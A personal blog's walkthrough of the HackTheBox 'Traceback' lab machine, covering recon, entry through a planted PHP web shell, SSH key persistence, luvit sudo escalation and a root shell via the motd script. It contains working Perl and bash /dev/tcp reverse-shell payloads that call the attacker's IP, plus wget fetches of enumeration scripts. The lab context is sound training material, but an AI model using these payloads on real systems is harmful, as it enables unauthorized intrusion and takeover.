Ajdin's blog Tags Github RSS

HackTheBox Traceback Write Up w/o Metasploit

18 Aug 2020

Traceback is an easy Linux box created by Xh4H. You have to enter a shell planted on the server, enter as webadmin, escalate privileges with lua/luvit to sysadmin and echo a reverse shell in 00-header file to get root access. If you have any questions you can find me on twitter @ajdintrejic.

Reconnaissance

Let’s run a quick nmap and full nmap scan in background:

#top 1000 ports
sudo nmap -sV -sC -O -oA nmap/initial 10.10.10.181

#all ports
sudo nmap -p- -sV -sC -O -oA nmap/full 10.10.10.181  

We have a web page on port 80:

There is no robots.txt , but there is a comment that might be useful.

I’ll also ran gobuster:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.181 -x php,html -t 100

But before it was finished I found out the next step. It also had a lot of errors (due to having a bad connection). So I won’t paste it here as it’s not important.

Getting user

We can assume the hacker left in a shell by that comment. We can google that comment and find a repo containing some web shells.

I tried opening all off then on 10.10.10.181/<shell.php> , I only got a login prompt for smevk.php.

Smevk.php

Let’s open that

I got in with admin:admin.

We have entered the system and we are webadmin now,

now we should try to get a reverse shell so we can try to escalate privileges to user.

Reverse shell as webadmin

I couldn’t get it to work with nc but I did it with a perl reverse script from here.

Start a nc listener for reverse shell on your local machine (I used port 1233) with:

sudo nc -lvnp 1233 

On backdoor webpage execute the payload but make sure to edit the IP and port.

perl -e 'use Socket;
$i="10.10.15.209";
$p=1233;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){
	open(STDIN,">&S");
	open(STDOUT,">&S");
	open(STDERR,">&S");
	exec("/bin/sh -i");
};'

After executing that command we will get a sh shell as webmin:

We can cat /etc/passwd and see that we have to get into the sysadmin account.

sysadmin:x:1001:1001::/home/sysadmin:/bin/sh

ssh-keygen

Let’s create out ssh keys while we’re here.

$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/webadmin/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/webadmin/.ssh/id_rsa.
Your public key has been saved in /home/webadmin/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:Yt9f+khAXW3DKXb83bieDKCgScOpwFjMwx7+uiZYZBY webadmin@traceback
The key's randomart image is:
+---[RSA 2048]----+
| +            +..|
|  E        . + *o|
|o+ = .    . o oo=|
|o.* = .  ..   . +|
| = + +o.S...   . |
|  o +. o.. .. .  |
|.. .    . . .+.. |
|o o        o ++  |
| o..        +..  |
+----[SHA256]-----+

Copy the private key id_rsa to your machine and add the public key id_rsa.pub into authorized keys with

echo "\n\n" >> authorized_keys
cat id_rsa.pub >> authorized_keys

We can ssh into the box now.

Enumeration

Grab linPEAS.sh and LinEnum.sh and create a new folder with an http server running, on your local machine.

After this we can grab the files and run them on the server. I created a /tmp/ajdin and pulled these files with wget :

wget http://10.10.15.209:1232/LinEnum.sh
wget http://10.10.15.209:1232/linpeas.sh

Looking at the output of linpeas.sh I’ve found 3 things:

We can check out the note first:

$ cat /home/webadmin/note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.

Okay, let’s remember lua, and carry on. The /etc/update-motd.d/ dir contains a script file 00-header

$ cat 00-header
<removed, not important>[ -r /etc/lsb-release ] && . /etc/lsb-release
echo "\nWelcome to Xh4H land \n"

but wait we’ve seen this text before, when we ssh’d into the box.

So can we get code execution here as root? Let’s first get sysadmin account so we can write to this file. We are left with SUID binary which has no entry in GTFOBin, but we can Google and see what it does.

Luvit privilege escalation

Wait so it has to do something with lua? If we check lua on GTFOBin, we can spawn a shell and escalate privileges:

lua -e 'os.execute("/bin/sh")'

but we have luvit so let’s try

$ sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/sh")'
sh: turning off NDELAY mode
whoami
sysadmin

We can now get the flag and continue:

cat user.txt
addd2ba938b3b4bf2e15374f413aee04

Getting Root

Amazing. Now let’s get back to that /etc/upadate-motd.d/ dir as sysadmin and try to get code execution as root:

$ echo “whoami” >> 00-header

For some reason you can’t make your ssh keys for this user. Anyway, we’ll insert the reverse shell bash payload into the 00-header .

First start netcat listener on port 1250 nc -lvnp 1250 . Now insert the reverse shell payload:

echo "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.136/1250 0>&1'" >> 00-header

And log back in. Now our netcat listener has a shell.

root@traceback:/# cat /root/root.txt
2218cd7369604176712a79ad09dd5414

Thanks for reading. If you have any questions feel free to reach out to me on Twitter @ajdintrejic.

smevk.php ssh moth luvit lua suid